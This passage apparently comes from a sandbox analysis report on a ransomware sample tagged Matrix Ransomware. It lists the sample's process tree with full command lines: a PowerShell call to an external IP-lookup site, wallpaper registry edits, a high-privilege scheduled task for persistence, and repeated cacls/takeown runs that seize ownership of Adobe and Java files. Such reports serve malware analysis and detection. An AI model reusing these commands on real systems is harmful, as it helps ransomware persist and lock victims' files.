50 PID 2448 wrote to memory of 2528 2448 cmd.exe 50 PID 2528 wrote to memory of 2940 2528 cmd.exe 52 PID 2528 wrote to memory of 2940 2528 cmd.exe 52 PID 2528 wrote to memory of 2940 2528 cmd.exe 52 PID 2528 wrote to memory of 2940 2528 cmd.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe"1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NW9TWHdy.exe"2⤵PID:2792
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NW9TWHdy.exe"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NW9TWHdy.exe" -n2⤵
- Executes dropped EXE
PID:2616
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\oD4C6kEj.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:528 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:772
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Pg6QDL2X.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Pg6QDL2X.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:1860
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:1692
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:1660
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\YxsHUsXc.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\YxsHUsXc.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\OHL8ImHx.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵PID:1280
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\OHL8ImHx.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:772
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:1424
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:3592
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵PID:1036
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵PID:560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2940 -
C:\Users\Admin\AppData\Local\Temp\QvFgQs9v64.exeQvFgQs9v.exe -accepteula "DefaultID.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
- Loads dropped DLL
PID:3092 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C3⤵PID:3564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"3⤵PID:3904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner3⤵
- Loads dropped DLL
PID:3712 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner4⤵
- Executes dropped EXE
PID:4068
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Loads dropped DLL
PID:1164 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:3564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵
- Modifies file permissions
PID:2536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
PID:4088 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2836
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2068
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵
- Loads dropped DLL
PID:2292 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:3408
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵PID:2852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "ENUtxt.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2464 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "ENUtxt.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2312
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2912
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:3972 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:2740
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"3⤵PID:1104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:3460 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:2108
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Loads dropped DLL
PID:3008 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:756
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Modifies file permissions
PID:2132
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2972 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:2816
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3508
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Loads dropped DLL
PID:1108 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:3512
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵
- Modifies file permissions
PID:632
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2440 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
PID:3624
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Loads dropped DLL
PID:3904 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:2744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵PID:1648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
PID:2512 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1296
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""2⤵
- Loads dropped DLL
PID:2040 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C3⤵PID:3928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"3⤵PID:3936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "license.html" -nobanner3⤵
- Loads dropped DLL
PID:2476 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "license.html" -nobanner4⤵
- Executes dropped EXE
PID:4076
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3976
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""2⤵
- Loads dropped DLL
PID:1360 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C3⤵PID:2464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"3⤵
- Modifies file permissions
PID:2292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "add_reviewer.gif" -nobanner3⤵
- Loads dropped DLL
PID:1936 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "add_reviewer.gif" -nobanner4⤵
- Executes dropped EXE
PID:3968
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""2⤵
- Loads dropped DLL
PID:3720 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C3⤵PID:2968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"3⤵PID:3772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "forms_received.gif" -nobanner3⤵
- Loads dropped DLL
PID:3796 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "forms_received.gif" -nobanner4⤵
- Executes dropped EXE
PID:3808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""2⤵
- Loads dropped DLL
PID:3776 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C3⤵PID:3840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"3⤵
- Modifies file permissions
PID:2120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "reviews_super.gif" -nobanner3⤵
- Loads dropped DLL
PID:1524 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "reviews_super.gif" -nobanner4⤵
- Executes dropped EXE
PID:3540
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3868
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""2⤵
- Loads dropped DLL
PID:2412 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C3⤵PID:4072
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"3⤵PID:1680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "submission_history.gif" -nobanner3⤵
- Loads dropped DLL
PID:2004 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "submission_history.gif" -nobanner4⤵
- Executes dropped EXE
PID:1688
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""2⤵
- Loads dropped DLL
PID:1412 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵PID:2376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "Identity-H" -nobanner3⤵
- Loads dropped DLL
PID:1032 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "Identity-H" -nobanner4⤵
- Executes dropped EXE
PID:3076
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2128
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""2⤵
- Loads dropped DLL
PID:3712 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C3⤵PID:1944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"3⤵PID:3108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "MinionPro-Regular.otf" -nobanner3⤵
- Loads dropped DLL
PID:2520 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "MinionPro-Regular.otf" -nobanner4⤵
- Executes dropped EXE
PID:1572
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""2⤵
- Loads dropped DLL
PID:1416 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C3⤵PID:336
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"3⤵PID:3136
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "ZY______.PFB" -nobanner3⤵
- Loads dropped DLL
PID:2712 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "ZY______.PFB" -nobanner4⤵
- Executes dropped EXE
PID:2232
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""2⤵
- Loads dropped DLL
PID:3092 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C3⤵PID:2144
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"3⤵PID:2688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "brt32.clx" -nobanner3⤵
- Loads dropped DLL
PID:3220 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "brt32.clx" -nobanner4⤵
- Executes dropped EXE
PID:880
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""2⤵
- Loads dropped DLL
PID:3292 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C3⤵PID:3916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"3⤵PID:3332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "usa.fca" -nobanner3⤵
- Loads dropped DLL
PID:3264 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "usa.fca" -nobanner4⤵
- Executes dropped EXE
PID:1868
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""2⤵
- Loads dropped DLL
PID:2936 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C3⤵PID:2872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"3⤵
- Modifies file permissions
PID:3240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "CROATIAN.TXT" -nobanner3⤵
- Loads dropped DLL
PID:3184 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "CROATIAN.TXT" -nobanner4⤵
- Executes dropped EXE
PID:3256
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3612
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""2⤵
- Loads dropped DLL
PID:2860 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C3⤵PID:3436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"3⤵
- Modifies file permissions
PID:1028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "CP1251.TXT" -nobanner3⤵
- Loads dropped DLL
PID:3216 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "CP1251.TXT" -nobanner4⤵
- Executes dropped EXE
PID:1984
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵
- Loads dropped DLL
PID:3376 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:3420
-
-
